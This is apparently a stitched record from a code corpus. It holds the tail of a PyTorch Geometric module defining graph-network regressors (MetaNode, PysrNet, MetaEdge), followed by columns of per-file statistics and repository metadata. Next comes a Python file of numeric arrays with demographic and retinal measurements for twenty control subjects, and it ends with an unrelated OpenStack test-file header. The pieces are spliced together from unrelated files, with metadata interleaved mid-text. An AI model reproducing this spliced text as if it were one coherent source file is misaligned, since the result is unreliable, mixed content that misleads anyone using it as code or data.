        raise ValueError("Unknown decode activation: %r" % (self.decode_activation,))

    def _run_heads(self, x, norms, heads):
        """Apply each (norms, linears) head to a fresh copy of ``x`` and
        concatenate the per-head scalar outputs along dim 1."""
        outs = []
        for norm, decode in zip(norms, heads):
            h = clone(x)
            for n, d in zip(norm, decode):
                h = d(n(h))
            outs.append(self.decode_act(h))
        return cat(outs, dim=1)

    def forward(self, graph):
        """Run the network on a batched graph.

        Args:
            graph: torch_geometric ``Data``/``Batch`` with ``x``,
                ``edge_index`` and ``batch``.

        Returns:
            ``x_out`` of shape (n_graphs, out_channels); plus ``sig`` when
            ``self.variance`` is set, plus ``tanh(rho)`` when ``self.rho``
            is also non-zero.
        """
        x = self.node_enc(graph.x)  # encode all node features
        adj = graph.edge_index
        # Initial "edge" features: per-destination sum of encoded source
        # features, re-encoded. NOTE(review): this tensor is node-indexed,
        # not per-edge — EdgeModel2 presumably expects that; confirm.
        e = self.edge_enc(scatter_add(x[adj[0]], adj[1], dim=0))
        # Global features start at zero; there is no global model, so the
        # returned u is discarded each step.
        u = zeros(
            graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
        )
        batch = graph.batch
        for op in self.convs:
            x, e, _ = op(x, adj, e, u, batch)
        if self.agg == 'sum':
            x = global_add_pool(x, batch)
        if self.agg == 'max':
            x = global_max_pool(x, batch)
        x_out = self._run_heads(x, self.norms, self.decoders)
        if self.variance:
            sig = abs(self._run_heads(x, self.sig_norms, self.sigs))
            if self.rho != 0:
                rho = abs(self._run_heads(x, self.rho_norms, self.rhos))
                return x_out, sig, tanh(rho)
            return x_out, sig
        return x_out
class MetaNode(Module):
    """Graph-network regressor using only a node model (no edge or global
    model).

    Node features are MLP-encoded and the raw scalar edge attribute is
    passed straight to the NodeNodeModel convolutions. Pooled graph
    features are decoded by ``out_channels`` independent LayerNorm+Linear
    heads, with optional variance (``variance``) and correlation (``rho``)
    heads.
    """

    def __init__(self, hidden_channels, in_channels, out_channels, encode=True,
                 conv_layers=3, conv_activation='relu', decode_layers=2,
                 decode_activation='none', layernorm=True, variance=0,
                 agg='sum', rho=0):
        super(MetaNode, self).__init__()
        self.encode = encode
        self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
        self.decode_activation = decode_activation
        self.conv_activation = conv_activation
        self.layernorm = layernorm
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.hidden_channels = hidden_channels
        self.variance = variance
        self.agg = agg
        self.rho = rho
        ########################
        # Convolutional Layers #
        ########################
        self.convs = ModuleList()
        for _ in range(int(conv_layers)):
            self.convs.append(MetaLayer(edge_model=None,
                                        node_model=NodeNodeModel(hidden_channels),
                                        global_model=None))
        ##################
        # Decode Layers #
        ##################
        self.decoders = ModuleList()
        self.norms = ModuleList()
        for _ in range(out_channels):
            # NOTE: self.decoder/self.norm are loop temporaries that also
            # register as submodules; kept assigned so state_dict keys stay
            # compatible with checkpoints saved by the original code.
            self.decoder, self.norm = self._make_head(decode_layers)
            self.decoders.append(self.decoder)
            self.norms.append(self.norm)
        ###################
        # Variance Layers #
        ###################
        if variance:
            self.sigs = ModuleList()
            self.sig_norms = ModuleList()
            for _ in range(out_channels):
                self.sig, self.sig_norm = self._make_head(decode_layers)
                self.sigs.append(self.sig)
                self.sig_norms.append(self.sig_norm)
        ######################
        # Co-Variance Layers #
        ######################
        if self.rho != 0:
            self.rhos = ModuleList()
            self.rho_norms = ModuleList()
            for _ in range(self.rho):
                self.rho_l, self.rho_norm = self._make_head(decode_layers)
                self.rhos.append(self.rho_l)
                self.rho_norms.append(self.rho_norm)
        #####################
        # Activation Layers #
        #####################
        self.conv_act = self.conv_act_f()  # not used in forward() here
        self.decode_act = self.decode_act_f()

    def _make_head(self, decode_layers):
        """Build one decoder head: a (Linear, LayerNorm) pair per layer,
        with the final Linear mapping hidden_channels -> 1."""
        linears = ModuleList()
        norms = ModuleList()
        for i in range(decode_layers):
            norms.append(LayerNorm(normalized_shape=self.hidden_channels))
            width = 1 if i == decode_layers - 1 else self.hidden_channels
            linears.append(Linear(self.hidden_channels, width))
        return linears, norms

    def conv_act_f(self):
        """Select the convolution activation; raises on unknown names
        (previously unrecognised truthy names silently returned None)."""
        if self.conv_activation == 'relu':
            print('RelU conv activation')
            return ReLU()
        if self.conv_activation == 'leakyrelu':
            print('LeakyRelU conv activation')
            return LeakyReLU()
        raise ValueError("Please specify a conv activation function")

    def decode_act_f(self):
        """Select the decoder activation; 'none' (the default) or a falsy
        value yields a callable Identity no-op. Previously None was
        returned, which made forward() raise TypeError."""
        if self.decode_activation == 'relu':
            print('RelU decode activation')
            return ReLU()
        if self.decode_activation == 'leakyrelu':
            print('LeakyRelU decode activation')
            return LeakyReLU()
        from torch.nn import Identity
        if not self.decode_activation or self.decode_activation == 'none':
            return Identity()
        raise ValueError("Unknown decode activation: %r" % (self.decode_activation,))

    def _run_heads(self, x, norms, heads):
        """Apply each (norms, linears) head to a fresh copy of ``x`` and
        concatenate the per-head scalar outputs along dim 1."""
        outs = []
        for norm, decode in zip(norms, heads):
            h = clone(x)
            for n, d in zip(norm, decode):
                h = d(n(h))
            outs.append(self.decode_act(h))
        return cat(outs, dim=1)

    def forward(self, graph):
        """Run the network on a batched graph.

        Args:
            graph: torch_geometric ``Data``/``Batch`` with ``x``,
                ``edge_index``, ``edge_attr`` and ``batch``.

        Returns:
            ``x_out`` of shape (n_graphs, out_channels); plus ``sig`` when
            ``self.variance`` is set, plus ``tanh(rho)`` when ``self.rho``
            is also non-zero.
        """
        x = self.node_enc(graph.x)  # encode all node features
        adj = graph.edge_index
        # Raw edge attribute as a column vector; no edge encoder in this
        # variant (the edge model is None).
        e = graph.edge_attr.view(-1, 1)
        # Global features start at zero and are never updated (no global
        # model); the conv outputs for e and u are discarded.
        u = zeros(
            graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
        )
        batch = graph.batch
        for op in self.convs:
            x, _, _ = op(x, adj, e, u, batch)
        if self.agg == 'sum':
            x = global_add_pool(x, batch)
        if self.agg == 'max':
            x = global_max_pool(x, batch)
        x_out = self._run_heads(x, self.norms, self.decoders)
        if self.variance:
            sig = abs(self._run_heads(x, self.sig_norms, self.sigs))
            if self.rho != 0:
                rho = abs(self._run_heads(x, self.rho_norms, self.rhos))
                return x_out, sig, tanh(rho)
            return x_out, sig
        return x_out
class PysrNet(Module):
    """Compact encode/message/update/decode graph network.

    ``g1`` encodes node features, ``g2`` encodes the per-node sum of
    neighbour encodings, ``g3`` updates nodes after the message is added,
    and ``f`` decodes the pooled graph representation.
    """

    def __init__(self, n_outs=3, hidden_channels=64, n_feat=5, n_targ=1):
        super(PysrNet, self).__init__()
        self.g1 = MLP(n_feat, n_outs, hidden=hidden_channels)   # node encoder
        self.g2 = MLP(n_outs, n_outs, hidden=hidden_channels)   # message encoder
        self.g3 = MLP(n_outs, n_outs, hidden=hidden_channels)   # node updater
        self.f = MLP(n_outs, n_targ, hidden=hidden_channels)    # graph decoder

    def forward(self, x, edge_index, batch):
        # Encode nodes, then sum each edge's source encoding into its
        # destination index to form per-node neighbourhood messages.
        h = self.g1(x)
        src, dst = edge_index[0], edge_index[1]
        msg = self.g2(scatter_add(h[src], dst, dim=0))
        # Only nodes that actually receive an edge get the message term.
        h[dst] += msg[dst]
        h = self.g3(h)
        # Pool to graph level and decode the targets.
        return self.f(global_add_pool(h, batch))
class MetaEdge(Module):
    """Graph-network regressor with edge and node models but no global
    model, using true per-edge features.

    Edge inputs are the raw edge attribute concatenated with the
    across-edge difference of two selected node features (3 values total,
    matching the ``MLP(3, hidden_channels)`` edge encoder). After
    ``conv_layers`` MetaLayer blocks, pooled graph features are decoded by
    ``out_channels`` independent LayerNorm+Linear heads, with optional
    variance (``variance``) and correlation (``rho``) heads.
    """

    def __init__(self, hidden_channels, in_channels, out_channels, encode=True,
                 conv_layers=3, conv_activation='relu', decode_layers=2,
                 decode_activation='none', layernorm=True, variance=0,
                 agg='sum', rho=0):
        super(MetaEdge, self).__init__()
        self.encode = encode
        self.node_enc = MLP(in_channels, hidden_channels, layer_norm=True)
        self.edge_enc = MLP(3, hidden_channels, layer_norm=True)
        self.decode_activation = decode_activation
        self.conv_activation = conv_activation
        self.layernorm = layernorm
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.hidden_channels = hidden_channels
        self.variance = variance
        self.agg = agg
        self.rho = rho
        ########################
        # Convolutional Layers #
        ########################
        self.convs = ModuleList()
        for _ in range(int(conv_layers)):
            self.convs.append(MetaLayer(edge_model=EdgeModel(hidden_channels),
                                        node_model=NodeModel(hidden_channels),
                                        global_model=None))
        ##################
        # Decode Layers #
        ##################
        self.decoders = ModuleList()
        self.norms = ModuleList()
        for _ in range(out_channels):
            # NOTE: self.decoder/self.norm are loop temporaries that also
            # register as submodules; kept assigned so state_dict keys stay
            # compatible with checkpoints saved by the original code.
            self.decoder, self.norm = self._make_head(decode_layers)
            self.decoders.append(self.decoder)
            self.norms.append(self.norm)
        ###################
        # Variance Layers #
        ###################
        if variance:
            self.sigs = ModuleList()
            self.sig_norms = ModuleList()
            for _ in range(out_channels):
                self.sig, self.sig_norm = self._make_head(decode_layers)
                self.sigs.append(self.sig)
                self.sig_norms.append(self.sig_norm)
        ######################
        # Co-Variance Layers #
        ######################
        if self.rho != 0:
            self.rhos = ModuleList()
            self.rho_norms = ModuleList()
            for _ in range(self.rho):
                self.rho_l, self.rho_norm = self._make_head(decode_layers)
                self.rhos.append(self.rho_l)
                self.rho_norms.append(self.rho_norm)
        #####################
        # Activation Layers #
        #####################
        self.conv_act = self.conv_act_f()  # not used in forward() here
        self.decode_act = self.decode_act_f()

    def _make_head(self, decode_layers):
        """Build one decoder head: a (Linear, LayerNorm) pair per layer,
        with the final Linear mapping hidden_channels -> 1."""
        linears = ModuleList()
        norms = ModuleList()
        for i in range(decode_layers):
            norms.append(LayerNorm(normalized_shape=self.hidden_channels))
            width = 1 if i == decode_layers - 1 else self.hidden_channels
            linears.append(Linear(self.hidden_channels, width))
        return linears, norms

    def conv_act_f(self):
        """Select the convolution activation; raises on unknown names
        (previously unrecognised truthy names silently returned None)."""
        if self.conv_activation == 'relu':
            print('RelU conv activation')
            return ReLU()
        if self.conv_activation == 'leakyrelu':
            print('LeakyRelU conv activation')
            return LeakyReLU()
        raise ValueError("Please specify a conv activation function")

    def decode_act_f(self):
        """Select the decoder activation; 'none' (the default) or a falsy
        value yields a callable Identity no-op. Previously None was
        returned, which made forward() raise TypeError."""
        if self.decode_activation == 'relu':
            print('RelU decode activation')
            return ReLU()
        if self.decode_activation == 'leakyrelu':
            print('LeakyRelU decode activation')
            return LeakyReLU()
        from torch.nn import Identity
        if not self.decode_activation or self.decode_activation == 'none':
            return Identity()
        raise ValueError("Unknown decode activation: %r" % (self.decode_activation,))

    def _run_heads(self, x, norms, heads):
        """Apply each (norms, linears) head to a fresh copy of ``x`` and
        concatenate the per-head scalar outputs along dim 1."""
        outs = []
        for norm, decode in zip(norms, heads):
            h = clone(x)
            for n, d in zip(norm, decode):
                h = d(n(h))
            outs.append(self.decode_act(h))
        return cat(outs, dim=1)

    def forward(self, graph):
        """Run the network on a batched graph.

        Args:
            graph: torch_geometric ``Data``/``Batch`` with ``x``,
                ``edge_index``, ``edge_attr`` and ``batch``.

        Returns:
            ``x_out`` of shape (n_graphs, out_channels); plus ``sig`` when
            ``self.variance`` is set, plus ``tanh(rho)`` when ``self.rho``
            is also non-zero.
        """
        x = self.node_enc(graph.x)  # encode all node features
        # assumes columns 0 and 3 of graph.x are scale factor and virial
        # mass (per the original comment) — TODO confirm
        e_feat = graph.x[:, [0, 3]]
        adj = graph.edge_index
        # Edge encoding: raw edge attribute + across-edge feature deltas
        # (3 values, matching edge_enc's input width).
        e_encode = cat([graph.edge_attr.view(-1, 1),
                        e_feat[adj[0]] - e_feat[adj[1]]], -1)
        e = self.edge_enc(e_encode)
        # Global features start at zero; no global model, so u's update is
        # discarded each step.
        u = zeros(
            graph.batch[-1] + 1, self.hidden_channels, device=x.device, dtype=float32
        )
        batch = graph.batch
        for op in self.convs:
            x, e, _ = op(x, adj, e, u, batch)
        if self.agg == 'sum':
            x = global_add_pool(x, batch)
        if self.agg == 'max':
            x = global_max_pool(x, batch)
        x_out = self._run_heads(x, self.norms, self.decoders)
        if self.variance:
            sig = abs(self._run_heads(x, self.sig_norms, self.sigs))
            if self.rho != 0:
                rho = abs(self._run_heads(x, self.rho_norms, self.rhos))
                return x_out, sig, tanh(rho)
            return x_out, sig
        return x_out
| 38.87664
| 166
| 0.544378
| 5,322
| 44,436
| 4.367531
| 0.055242
| 0.0783
| 0.041043
| 0.037429
| 0.875323
| 0.860781
| 0.847789
| 0.841421
| 0.838023
| 0.825159
| 0
| 0.011643
| 0.327392
| 44,436
| 1,143
| 167
| 38.87664
| 0.76606
| 0.096026
| 0
| 0.854192
| 0
| 0
| 0.029472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048603
| false
| 0
| 0.006075
| 0.001215
| 0.133657
| 0.030377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c09162bee5436b9a66ba797a032e600443982ce4
| 10,113
|
py
|
Python
|
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/fep_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
fep_control_clinical = [[24, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4, 100, 0.17, 0.012, 97, 0.12, 0.007, 96, 138, 70, 137, 55, 129, 77, 131, 50, 266, 249, 258, 294, 272, 292, 259, 250, 247, 9.80, 273, 248, 9.90, 275, 77, 77],
[21, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1, 66, 0.07, 0.000, 85, 0.08, 0.000, 68, 57, 76, 80, 52, 94, 98, 99, 48, 286, 257, 265, 305, 282, 293, 263, 266, 242, 10.00, 278, 243, 10.00, 277, 80, 78],
[25, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4, 98, 0.52, 0.208, 92, 0.62, 0.391, 84, 133, 61, 125, 72, 132, 62, 107, 67, 278, 268, 265, 298, 272, 284, 263, 257, 242, 10.10, 279, 240, 9.90, 275, 81, 78],
[23, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4, 104, 0.58, 0.225, 110, 0.52, 0.183, 93, 129, 69, 135, 83, 122, 77, 148, 94, 278, 256, 261, 299, 282, 294, 260, 256, 258, 10.10, 281, 254, 10.10, 280, 87, 87],
[21, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1, 114, 0.55, 0.138, 115, 0.55, 0.181, 91, 132, 88, 147, 88, 138, 94, 147, 82, 310, 284, 288, 333, 308, 333, 291, 287, 296, 11.10, 308, 303, 11.20, 311, 94, 95],
[20, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1, 109, 0.36, 0.038, 108, 0.42, 0.071, 91, 143, 70, 150, 74, 148, 68, 137, 79, 292, 282, 275, 301, 287, 306, 277, 278, 288, 10.60, 294, 284, 10.80, 293, 90, 89],
[21, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4, 92, 0.45, 0.097, 94, 0.40, 0.063, 93, 122, 64, 119, 62, 119, 69, 125, 65, 274, 257, 262, 288, 280, 290, 262, 258, 246, 9.80, 272, 250, 9.90, 274, 77, 78],
[25, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4, 96, 0.43, 0.080, 97, 0.42, 0.065, 89, 105, 60, 132, 89, 102, 63, 134, 89, 288, 275, 284, 323, 291, 316, 277, 278, 291, 10.80, 299, 287, 10.80, 300, 84, 82],
[26, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4, 80, 0.38, 0.018, 91, 0.09, 0.000, 80, 95, 90, 79, 53, 97, 126, 72, 68, 269, 234, 228, 284, 262, 287, 241, 229, 235, 9.40, 260, 235, 9.30, 259, 68, 68],
[27, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5, 88, 0.30, 0.033, 88, 0.38, 0.060, 91, 107, 65, 121, 61, 105, 71, 111, 64, 294, 262, 269, 310, 291, 301, 264, 259, 281, 10.40, 288, 279, 10.30, 285, 82, 81],
[23, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4, 114, 0.67, 0.470, 115, 0.70, 0.593, 90, 128, 60, 166, 103, 129, 64, 151, 114, 307, 286, 289, 313, 306, 327, 293, 290, 231, 10.80, 299, 244, 11.00, 305, 94, 94],
[23, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4, 102, 0.49, 0.145, 103, 0.41, 0.082, 88, 119, 64, 145, 78, 125, 68, 135, 84, 303, 290, 292, 322, 295, 320, 298, 291, 263, 11.00, 306, 259, 11.00, 305, 85, 84],
[24, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1, 92, 0.58, 0.234, 95, 0.64, 0.305, 88, 102, 79, 118, 70, 92, 91, 126, 72, 273, 258, 264, 287, 275, 291, 262, 251, 252, 9.80, 273, 254, 9.80, 273, 78, 78],
[27, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4, 88, 0.61, 0.228, 85, 0.62, 0.257, 93, 111, 57, 118, 59, 107, 68, 112, 55, 260, 236, 246, 277, 254, 276, 250, 238, 244, 9.40, 262, 243, 9.40, 261, 76, 75],
[21, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1, 103, 0.38, 0.054, 106, 0.35, 0.045, 84, 119, 55, 139, 98, 125, 56, 145, 98, 298, 272, 284, 330, 298, 309, 272, 269, 256, 10.70, 296, 249, 10.30, 287, 87, 86],
[26, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4, 96, 0.48, 0.124, 95, 0.45, 0.106, 66, 118, 68, 112, 86, 118, 76, 121, 67, 272, 267, 278, 306, 273, 294, 257, 255, 255, 10.30, 286, 242, 10.00, 278, 83, 78],
[22, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4, 116, 0.58, 0.312, 115, 0.62, 0.410, 91, 156, 69, 163, 74, 156, 68, 165, 73, 312, 295, 315, 339, 306, 332, 299, 290, 226, 11.20, 311, 227, 11.20, 310, 96, 95],
[21, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1, 92, 0.34, 0.018, 98, 0.12, 0.002, 94, 117, 74, 123, 55, 112, 82, 136, 60, 280, 250, 270, 304, 281, 304, 266, 256, 221, 10.00, 279, 221, 10.10, 281, 85, 86],
[22, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1, 108, 0.56, 0.101, 107, 0.52, 0.150, 94, 129, 78, 154, 71, 130, 84, 150, 64, 269, 260, 262, 301, 266, 290, 251, 252, 249, 9.90, 275, 242, 9.70, 271, 87, 85],
[20, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1, 89, 0.66, 0.538, 90, 0.68, 0.541, 95, 125, 45, 121, 67, 129, 43, 119, 70, 272, 251, 254, 293, 267, 290, 258, 253, 274, 9.90, 274, 277, 9.90, 274, 79, 78]]
more_clinical = [[5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [6, 2, 1, 1], [2, 2, 2, 1], [5, 1, 2, 1], [6, 2, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [5, 1, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [2, 2, 2, 1], [5, 1, 2, 1], [4, 2, 2, 1], [5, 1, 2, 1], [3, 2, 2, 1], [3, 2, 2, 2]]
fep_control_full_clinical = [[2, 5, 1, 2, 1, 24, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4, 100, 0.17, 0.012, 97, 0.12, 0.007, 96, 138, 70, 137, 55, 129, 77, 131, 50, 266, 249, 258, 294, 272, 292, 259, 250, 247, 9.8, 273, 248, 9.9, 275, 77, 77], [2, 2, 2, 2, 1, 21, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1, 66, 0.07, 0.0, 85, 0.08, 0.0, 68, 57, 76, 80, 52, 94, 98, 99, 48, 286, 257, 265, 305, 282, 293, 263, 266, 242, 10.0, 278, 243, 10.0, 277, 80, 78], [1, 5, 1, 2, 1, 25, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4, 98, 0.52, 0.208, 92, 0.62, 0.391, 84, 133, 61, 125, 72, 132, 62, 107, 67, 278, 268, 265, 298, 272, 284, 263, 257, 242, 10.1, 279, 240, 9.9, 275, 81, 78], [2, 6, 2, 1, 1, 23, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4, 104, 0.58, 0.225, 110, 0.52, 0.183, 93, 129, 69, 135, 83, 122, 77, 148, 94, 278, 256, 261, 299, 282, 294, 260, 256, 258, 10.1, 281, 254, 10.1, 280, 87, 87], [1, 2, 2, 2, 1, 21, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1, 114, 0.55, 0.138, 115, 0.55, 0.181, 91, 132, 88, 147, 88, 138, 94, 147, 82, 310, 284, 288, 333, 308, 333, 291, 287, 296, 11.1, 308, 303, 11.2, 311, 94, 95], [1, 5, 1, 2, 1, 20, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1, 109, 0.36, 0.038, 108, 0.42, 0.071, 91, 143, 70, 150, 74, 148, 68, 137, 79, 292, 282, 275, 301, 287, 306, 277, 278, 288, 10.6, 294, 284, 10.8, 293, 90, 89], [2, 6, 2, 2, 1, 21, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4, 92, 0.45, 0.097, 94, 0.4, 0.063, 93, 122, 64, 119, 62, 119, 69, 125, 65, 274, 257, 262, 288, 280, 290, 262, 258, 246, 9.8, 272, 250, 9.9, 274, 77, 78], [1, 5, 1, 2, 1, 25, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4, 96, 0.43, 0.08, 97, 0.42, 0.065, 89, 105, 60, 132, 89, 102, 63, 134, 89, 288, 275, 284, 323, 291, 316, 277, 278, 291, 10.8, 299, 287, 10.8, 300, 84, 82], [2, 2, 2, 2, 1, 26, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4, 80, 0.38, 0.018, 91, 0.09, 0.0, 80, 95, 90, 79, 53, 97, 126, 72, 68, 269, 234, 228, 284, 262, 287, 241, 229, 235, 9.4, 260, 235, 9.3, 259, 68, 68], [2, 5, 1, 2, 1, 27, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5, 88, 0.3, 0.033, 88, 0.38, 0.06, 91, 107, 
65, 121, 61, 105, 71, 111, 64, 294, 262, 269, 310, 291, 301, 264, 259, 281, 10.4, 288, 279, 10.3, 285, 82, 81], [2, 5, 1, 2, 1, 23, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4, 114, 0.67, 0.47, 115, 0.7, 0.593, 90, 128, 60, 166, 103, 129, 64, 151, 114, 307, 286, 289, 313, 306, 327, 293, 290, 231, 10.8, 299, 244, 11.0, 305, 94, 94], [2, 5, 1, 2, 1, 23, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4, 102, 0.49, 0.145, 103, 0.41, 0.082, 88, 119, 64, 145, 78, 125, 68, 135, 84, 303, 290, 292, 322, 295, 320, 298, 291, 263, 11.0, 306, 259, 11.0, 305, 85, 84], [2, 2, 2, 2, 1, 24, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1, 92, 0.58, 0.234, 95, 0.64, 0.305, 88, 102, 79, 118, 70, 92, 91, 126, 72, 273, 258, 264, 287, 275, 291, 262, 251, 252, 9.8, 273, 254, 9.8, 273, 78, 78], [1, 5, 1, 2, 1, 27, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4, 88, 0.61, 0.228, 85, 0.62, 0.257, 93, 111, 57, 118, 59, 107, 68, 112, 55, 260, 236, 246, 277, 254, 276, 250, 238, 244, 9.4, 262, 243, 9.4, 261, 76, 75], [2, 2, 2, 2, 1, 21, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1, 103, 0.38, 0.054, 106, 0.35, 0.045, 84, 119, 55, 139, 98, 125, 56, 145, 98, 298, 272, 284, 330, 298, 309, 272, 269, 256, 10.7, 296, 249, 10.3, 287, 87, 86], [1, 5, 1, 2, 1, 26, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4, 96, 0.48, 0.124, 95, 0.45, 0.106, 66, 118, 68, 112, 86, 118, 76, 121, 67, 272, 267, 278, 306, 273, 294, 257, 255, 255, 10.3, 286, 242, 10.0, 278, 83, 78], [1, 4, 2, 2, 1, 22, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4, 116, 0.58, 0.312, 115, 0.62, 0.41, 91, 156, 69, 163, 74, 156, 68, 165, 73, 312, 295, 315, 339, 306, 332, 299, 290, 226, 11.2, 311, 227, 11.2, 310, 96, 95], [2, 5, 1, 2, 1, 21, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1, 92, 0.34, 0.018, 98, 0.12, 0.002, 94, 117, 74, 123, 55, 112, 82, 136, 60, 280, 250, 270, 304, 281, 304, 266, 256, 221, 10.0, 279, 221, 10.1, 281, 85, 86], [1, 3, 2, 2, 1, 22, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1, 108, 0.56, 0.101, 107, 0.52, 0.15, 94, 129, 78, 154, 71, 130, 84, 150, 64, 269, 260, 262, 301, 266, 290, 251, 252, 249, 9.9, 275, 242, 9.7, 271, 
87, 85], [1, 3, 2, 2, 2, 20, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1, 89, 0.66, 0.538, 90, 0.68, 0.541, 95, 125, 45, 121, 67, 129, 43, 119, 70, 272, 251, 254, 293, 267, 290, 258, 253, 274, 9.9, 274, 277, 9.9, 274, 79, 78]]
sex = [2, 2, 1, 2, 1, 1, 2, 1, 2, 2, 2, 2, 2, 1, 2, 1, 1, 2, 1, 1]
# Columns of fep_control_clinical_only (one row per subject): Age, Sex, Race, Simp_Race, Ethnicity, Handedness, WTAR_raw, WTAR_scaled, Corrected_vision, OSLogMar, ODLogMar, BinocularLogMar, Education, Degree
fep_control_clinical_only = [[24, 2, 5, 1, 2, 1, 45, 120, 1, -0.1, 0.0, -0.1, 17, 4], [21, 2, 2, 2, 2, 1, 49, 127, 1, 0.0, 0.0, 0.0, 16, 1], [25, 1, 5, 1, 2, 1, 48, 124, 2, 0.0, 0.0, 0.0, 16, 4], [23, 2, 6, 2, 1, 1, 45, 120, 2, 0.0, 0.0, -0.1, 16, 4], [21, 1, 2, 2, 2, 1, 39, 110, 2, 0.2, 0.0, -0.1, 15, 1], [20, 1, 5, 1, 2, 1, 44, 118, 1, 0.0, 0.0, 0.0, 15, 1], [21, 2, 6, 2, 2, 1, 45, 120, 1, 0.0, 0.0, 0.0, 17, 4], [25, 1, 5, 1, 2, 1, 45, 119, 1, 0.1, 0.1, 0.0, 22, 4], [26, 2, 2, 2, 2, 1, 38, 108, 1, 0.0, 0.0, -0.1, 18, 4], [27, 2, 5, 1, 2, 1, 38, 108, 1, -0.3, -0.2, -0.2, 19, 5], [23, 2, 5, 1, 2, 1, 40, 112, 2, -0.1, -0.1, -0.1, 17, 4], [23, 2, 5, 1, 2, 1, 40, 112, 2, 0.1, 0.1, 0.0, 17, 4], [24, 2, 2, 2, 2, 1, 50, 128, 1, 0.1, 0.0, 0.0, 18, 1], [27, 1, 5, 1, 2, 1, 43, 116, 1, 0.0, 0.1, -0.1, 17, 4], [21, 2, 2, 2, 2, 1, 47, 123, 1, 0.1, -0.2, -0.2, 17, 1], [26, 1, 5, 1, 2, 1, 48, 124, 1, 0.1, 0.0, 0.1, 21, 4], [22, 1, 4, 2, 2, 1, 45, 120, 2, 0.0, 0.1, 0.0, 16, 4], [21, 2, 5, 1, 2, 1, 47, 123, 1, -0.1, -0.2, -0.2, 17, 1], [22, 1, 3, 2, 2, 1, 44, 118, 1, -0.1, -0.1, -0.1, 17, 1], [20, 1, 3, 2, 2, 2, 46, 122, 1, -0.1, -0.1, -0.1, 15, 1]]
# full = []
# for i in range(len(sex)):
# fep_control_full_clinical[i].insert(0, sex[i])
# # full.append(more_clinical[i] + fep_control_clinical[i])
# print(fep_control_full_clinical)
| 288.942857
| 4,213
| 0.505884
| 2,562
| 10,113
| 1.98829
| 0.113583
| 0.053004
| 0.051237
| 0.040047
| 0.782097
| 0.758343
| 0.746761
| 0.740283
| 0.737142
| 0.737142
| 0
| 0.60486
| 0.218728
| 10,113
| 35
| 4,214
| 288.942857
| 0.039868
| 0.032236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c0999c2b2be1a636cc0bcc03cdf9efbc0e864b23
| 4,986
|
py
|
Python
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2016-07-06T19:59:33.000Z
|
2016-07-06T19:59:33.000Z
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
